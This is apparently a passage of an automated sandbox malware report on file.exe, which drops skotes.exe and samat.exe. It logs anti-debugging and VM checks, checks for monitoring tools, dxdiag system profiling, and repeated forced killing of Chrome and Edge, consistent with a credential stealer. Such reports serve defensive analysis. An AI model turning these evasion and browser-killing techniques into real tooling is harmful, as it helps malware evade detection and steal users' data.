                    Source: file.exe, 00000000.00000002.2104728384.00000000008BD000.00000040.00000001.01000000.00000003.sdmp, skotes.exe, 00000002.00000002.2148371254.000000000099D000.00000040.00000001.01000000.00000007.sdmp, skotes.exe, 00000003.00000002.2152160498.000000000099D000.00000040.00000001.01000000.00000007.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
                    Source: C:\Users\user\Desktop\file.exeSystem information queried: ModuleInformationJump to behavior
                    Source: C:\Users\user\Desktop\file.exeProcess information queried: ProcessInformationJump to behavior

                    Anti Debugging

                    barindex
                    Source: C:\Users\user\Desktop\file.exeThread information set: HideFromDebuggerJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeThread information set: HideFromDebuggerJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeThread information set: HideFromDebuggerJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeThread information set: HideFromDebuggerJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeOpen window title or class name: regmonclass
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeOpen window title or class name: gbdyllo
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeOpen window title or class name: procmon_window_class
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeOpen window title or class name: ollydbg
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeOpen window title or class name: filemonclass
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile opened: NTICE
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile opened: SICE
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile opened: SIWVID
                    Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_053203B3 rdtsc 0_2_053203B3
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeCode function: 7_2_00007FF7E12CD12C IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,7_2_00007FF7E12CD12C
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeCode function: 8_2_00007FF8B7E8DE80 GetModuleHandleW,LoadLibraryW,GetProcAddress,AddAccessAllowedAce,GetProcAddress,AddAccessDeniedAce,GetProcAddress,AddAccessAllowedAceEx,GetProcAddress,AddMandatoryAce,GetProcAddress,AddAccessAllowedObjectAce,GetProcAddress,AddAccessDeniedAceEx,GetProcAddress,AddAccessDeniedObjectAce,GetProcAddress,AddAuditAccessAceEx,GetProcAddress,AddAuditAccessObjectAce,GetProcAddress,SetSecurityDescriptorControl,InitializeCriticalSection,TlsAlloc,DeleteCriticalSection,TlsFree,8_2_00007FF8B7E8DE80
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeCode function: 7_2_00007FF7E12E3480 GetProcessHeap,7_2_00007FF7E12E3480
                    Source: C:\Windows\System32\taskkill.exeProcess token adjusted: Debug
                    Source: C:\Windows\System32\taskkill.exeProcess token adjusted: Debug
                    Source: C:\Windows\System32\taskkill.exeProcess token adjusted: Debug
                    Source: C:\Windows\System32\taskkill.exeProcess token adjusted: Debug
                    Source: C:\Windows\System32\taskkill.exeProcess token adjusted: Debug
                    Source: C:\Windows\System32\taskkill.exeProcess token adjusted: Debug
                    Source: C:\Windows\System32\taskkill.exeProcess token adjusted: Debug
                    Source: C:\Windows\System32\taskkill.exeProcess token adjusted: Debug
                    Source: C:\Windows\System32\taskkill.exeProcess token adjusted: Debug
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeCode function: 7_2_00007FF7E12CD30C SetUnhandledExceptionFilter,7_2_00007FF7E12CD30C
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeCode function: 7_2_00007FF7E12CD12C IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,7_2_00007FF7E12CD12C
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeCode function: 7_2_00007FF7E12DA614 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,7_2_00007FF7E12DA614
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeCode function: 7_2_00007FF7E12CC8A0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,7_2_00007FF7E12CC8A0
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeCode function: 8_2_00007FF7E12CD30C SetUnhandledExceptionFilter,8_2_00007FF7E12CD30C
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeCode function: 8_2_00007FF7E12CD12C IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,8_2_00007FF7E12CD12C
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeCode function: 8_2_00007FF7E12DA614 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,8_2_00007FF7E12DA614
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeCode function: 8_2_00007FF7E12CC8A0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,8_2_00007FF7E12CC8A0
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeCode function: 8_2_00007FF8B7E8FBFC SetUnhandledExceptionFilter,8_2_00007FF8B7E8FBFC
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeCode function: 8_2_00007FF8B7E8FA14 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,8_2_00007FF8B7E8FA14
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeCode function: 8_2_00007FF8B7E8E8FC SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,8_2_00007FF8B7E8E8FC
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeCode function: 8_2_00007FF8B7EC0854 SetUnhandledExceptionFilter,8_2_00007FF8B7EC0854
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeCode function: 8_2_00007FF8B7EBFA68 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,8_2_00007FF8B7EBFA68
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeCode function: 8_2_00007FF8B7EC066C IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,8_2_00007FF8B7EC066C
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeCode function: 8_2_00007FF8B7EE1A80 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,8_2_00007FF8B7EE1A80
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeCode function: 8_2_00007FF8B7EE1030 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,8_2_00007FF8B7EE1030
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeCode function: 8_2_00007FF8B8112920 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,8_2_00007FF8B8112920
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeCode function: 8_2_00007FF8B8261960 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,8_2_00007FF8B8261960
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeCode function: 8_2_00007FF8B8261390 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,8_2_00007FF8B8261390
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeCode function: 8_2_00007FF8B8271390 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,8_2_00007FF8B8271390
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeCode function: 8_2_00007FF8B8271960 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,8_2_00007FF8B8271960
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeCode function: 8_2_00007FF8B8283248 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,8_2_00007FF8B8283248
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeCode function: 8_2_00007FF8B8282C90 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,8_2_00007FF8B8282C90
                    Source: C:\Users\user\Desktop\file.exeProcess created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe" Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe "C:\Users\user\AppData\Local\Temp\1008029001\samat.exe" Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeProcess created: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe "C:\Users\user\AppData\Local\Temp\1008029001\samat.exe" Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "dxdiag /t C:\Users\user\AppData\Local\Bunny\Info.txt"Jump to behavior
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\dxdiag.exe dxdiag /t C:\Users\user\AppData\Local\Bunny\Info.txtJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /IM chrome.exeJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /IM msedge.exeJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /IM msedge.exeJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /IM msedge.exeJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /IM msedge.exeJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /IM msedge.exeJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /IM msedge.exeJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /IM msedge.exeJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /IM msedge.exeJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeCode function: 8_2_00007FF8B7E87EB0 PyArg_ParseTuple,PyExc_TypeError,PyErr_SetString,GetSecurityDescriptorDacl,free,SetSecurityDescriptorDacl,GetSecurityDescriptorOwner,free,GetSecurityDescriptorGroup,free,free,free,8_2_00007FF8B7E87EB0
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeCode function: 8_2_00007FF8B7E88D60 PyArg_ParseTuple,PyErr_Clear,PyArg_ParseTuple,PyErr_Clear,PyArg_ParseTuple,PySequence_Check,PyExc_TypeError,PyErr_SetString,PySequence_Size,PySequence_Tuple,PyArg_ParseTuple,_Py_Dealloc,AllocateAndInitializeSid,PyExc_ValueError,PyErr_SetString,_Py_NewReference,malloc,memset,memcpy,8_2_00007FF8B7E88D60
                    Source: skotes.exe, skotes.exe, 00000003.00000002.2152160498.000000000099D000.00000040.00000001.01000000.00000007.sdmpBinary or memory string: }Program Manager
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeCode function: 7_2_00007FF7E12E9570 cpuid 7_2_00007FF7E12E9570
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: unknown VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: unknown VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\Cipher VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\Cipher VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\Cipher VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\Cipher VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\Hash VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\Hash VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\Hash VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\Hash VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\Hash VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\Hash VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\Hash VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\PublicKey VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\PublicKey VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\Util VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\certifi VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\charset_normalizer VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\setuptools VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\setuptools\_vendor VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\setuptools VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\setuptools\_vendor VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\setuptools\_vendor\importlib_metadata-8.0.0.dist-info VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\setuptools VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\setuptools\_vendor VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\setuptools\_vendor\importlib_metadata-8.0.0.dist-info VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\setuptools VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\setuptools VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\setuptools VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\setuptools VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\setuptools VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\setuptools\_vendor VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\setuptools\_vendor\wheel-0.43.0.dist-info VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\setuptools VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\setuptools\_vendor VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\setuptools\_vendor\wheel-0.43.0.dist-info VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\setuptools VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\setuptools\_vendor VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\setuptools\_vendor\wheel-0.43.0.dist-info VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\setuptools VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\setuptools\_vendor VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\setuptools\_vendor\wheel-0.43.0.dist-info VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\setuptools VolumeInformationJump to behavior
